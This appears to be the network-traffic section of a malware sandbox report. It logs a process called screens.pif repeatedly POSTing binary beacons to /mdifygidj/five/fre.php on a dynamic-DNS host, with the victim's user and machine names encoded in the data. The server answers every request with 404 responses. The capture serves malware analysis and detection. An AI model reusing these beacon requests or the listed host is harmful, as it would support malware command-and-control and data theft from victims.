                                                          Oct 3, 2024 09:21:33.526237965 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:35.070930958 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:33 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.
                                                          Oct 3, 2024 09:21:35.071086884 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:33 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.
                                                          Oct 3, 2024 09:21:35.071223974 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:33 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.104975245.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:35.220405102 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:35.225313902 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:36.956888914 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:35 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.104975345.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:37.116375923 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:37.121380091 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:42.165158033 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:38 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.104975445.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:42.312860966 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:42.317760944 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:43.028489113 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:42 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.104975545.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:43.177519083 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:43.182437897 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:43.857722044 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:43 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.104975645.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:44.014039993 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:44.019040108 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:44.831837893 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:44 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.104975745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:44.994793892 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:44.999700069 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:45.677170038 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:45 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.104975845.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:45.836055040 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:45.841002941 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:46.484633923 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:46 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.104975945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:46.635745049 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:46.640568972 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:47.380162954 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:46 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.104976045.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:47.534284115 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:47.539145947 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:48.314477921 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:47 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          48192.168.2.104976145.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:48.480703115 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:48.485569954 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:49.257085085 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:48 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          49192.168.2.104976245.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:50.346766949 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:50.351787090 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:51.014981031 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:50 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          50192.168.2.104976345.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:51.162585020 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:51.167462111 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:51.932621002 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:51 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          51192.168.2.104976445.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:52.082454920 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:52.087418079 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:52.836091042 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:52 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          52192.168.2.104976545.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:52.990757942 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:52.996562004 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:53.876535892 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:53 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          53192.168.2.104976645.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:54.034754038 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:54.039700985 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:54.812823057 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:54 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          54192.168.2.104976745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:54.979121923 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:54.984251976 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:55.759599924 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:55 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          55192.168.2.104976845.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:55.920949936 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:55.928869009 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:57.049071074 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:56 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.
                                                          Oct 3, 2024 09:21:57.049649954 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:56 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          56192.168.2.104976945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:57.204504013 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:57.209846973 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:58.038119078 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:57 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          57192.168.2.104977045.149.241.16980688C:\Users\user\Desktop\screens.pif
